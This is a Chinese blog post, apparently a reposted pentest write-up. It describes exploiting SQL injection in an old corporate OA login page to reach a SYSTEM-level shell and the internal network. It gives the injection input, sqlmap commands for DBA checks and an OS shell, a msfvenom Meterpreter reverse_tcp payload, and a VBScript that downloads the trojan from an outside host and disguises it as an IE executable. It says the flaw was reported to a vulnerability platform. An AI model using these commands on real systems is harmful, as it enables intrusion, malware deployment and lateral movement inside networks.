OA系统SYSTEM权限SQL注入内网漫游惊天大揭秘
admin2023-11-01【电脑应用】浏览:144
已提交至漏洞盒子,漏洞编号: vulbox-2019-0207481
此漏洞属于高危类型, 因为漏洞未经官方公开,敏感内容做打码处理,如有漏打,请提醒。
0x01 发现漏洞
七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统
IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注入
在用户名里输入admin’,不负期望地报了错
很明显,前后端都没有对用户的输入进行过滤,直接将’带入了SQL语句进行。初步判断,此OA系统存在SQL注入漏洞。
0x02 漏洞验证
打开BurpSuite,设置好浏览器代理,抓下HTTP请求,一气呵成。
问题参数为 txtLogin=admin%27
可将整个请求复制到 test.txt,使用sqlmap -r 来注入
sqlmap -u http://x.x.x.x/xx.aspx --forms
至此,可以确认存在 error-based、stack quires和time-based三个类型的漏洞
0x03 判断数据库用户的权限
发现SQL注入后,首先要判断权限,高权限的注入可以为后续渗透省下很大功夫
sqlmap -u http://x.x.x.x/xx.aspx --forms --is-dba
非常nice,再次不负期望地返回了DBA权限
输入以下命令,获得一个shell
sqlmap -u http://x.x.x.x/xx.aspx --forms --os-shell
NT/SYSTEM权限,时隔两个多月,复现有误,不予贴图
0x04 反弹shell 深入内网
生成一个shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx > /var/www/html/shell.exe
由于环境艰难,不能直接上传文件,我选择了用vbs脚本来下载木马到服务器
代码如下:
Set post=CreateObject("Msxml2.XMLHTTP")post.Open "GET","http://x.x.x.x/shell.exe"'发送请求post.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()'等待3秒,等文件下载wscript.sleep 3000 aGet.Write(post.responseBody)'写数据aGet.SaveToFile "shell.exe",2
用echo命令缓慢地写完了vbs脚本之后,顺利运行,下载了木马
更改名字,移动到IE安装目录进行伪装
start iee.exe 运行木马
metasploit成功收到了SYSTEM权限的shell
该主机拥有内网IP,存在内网,可以互通,并且该主机作为中央数据库
此内网主机皆为VMware虚拟机
0x05 结束测试,提交漏洞
本次渗透测试成功拿到最高权限, 到此为止,不再深入。
随着攻击与防御技术的彼此攀升,程序员的安全意识逐渐提高,SQL也越来越少。
但不少粗糙的程序和古老的系统仍然存在此漏洞,此类漏洞解决方法简单,只用对用户输入参数稍加处理即可。
作者:Woojay's Blog
相关文章
- 迅雷当前下载目录无法写入数据解决教程 迅雷存储路径无法写入文件
- 凯立德地图导航显示无地图 凯立德导航不显示地图
- 低配电脑装w10还是w7流畅 低配电脑装w10还是w7流畅好
- 轻松开启Win7蓝牙之旅:简单教程
- Win10八大神级截图方式,让你告别手残操作
- Excel表格的截图怎么保存成PDF格式 pdf文件怎么截取表格
- 解决Windows Modules Installer Worker进程高CPU、磁盘占用率:优化与策略
- 带你认识认识软件中常用的图标 表示软件的图标
- wps怎么绘制简笔画效果的圆桌 wps圆形怎么画
- win10运行3DMAX自动重启解决方法 3dmax打开电脑重启
- 怎么用wps更改图片背景色 wps如何更改图片背景色
热评文章
企业微信分屏老师能看到吗 企业微信切屏老师能看见吗
excel如何批量输入求和公式 excel批量输入求
罗技驱动win7能用吗 罗技鼠标支持win7系统吗
打印机驱动卸载干净教程 打印机驱动怎样卸载干净
显卡驱动更新小技巧,让你的电脑运行更稳定
手机系统声音不起眼,但很重要 手机系统声音有的,但